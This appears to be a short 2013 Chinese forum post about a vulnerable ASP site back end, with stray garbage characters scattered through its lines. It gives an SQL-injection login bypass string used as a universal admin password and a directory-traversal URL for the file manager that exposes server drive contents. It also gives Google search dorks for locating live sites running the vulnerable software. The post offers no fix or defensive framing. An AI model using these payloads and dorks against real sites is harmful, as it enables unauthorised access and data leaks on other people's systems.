后台万能密码 'or'='or'
/ F( \& T. C8 s( y: i5 k) f* [, Z: t/ z
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!( A9 W" k1 h1 V0 ^5 P
admin/uploadfile.asp?currentFolder=/upfiles/../
/ \- l$ t$ q$ W" l: k& E
& C b' d2 _9 p7 K5 ~" x& D漏洞证明:9 V) s9 L& I1 e# T: G
: g: N6 F# \% v3 a$ ^# u8 r谷歌:inurl:type.asp?id=1 新闻中心; f5 g) }/ {2 I( n. }( W
或者 :inurl:download_ok.asp?- S( U: c S. [& ~
6 m3 c0 B- h4 M& @. c
|
发表于 2013-3-14 20:17:32
收藏
支持
反对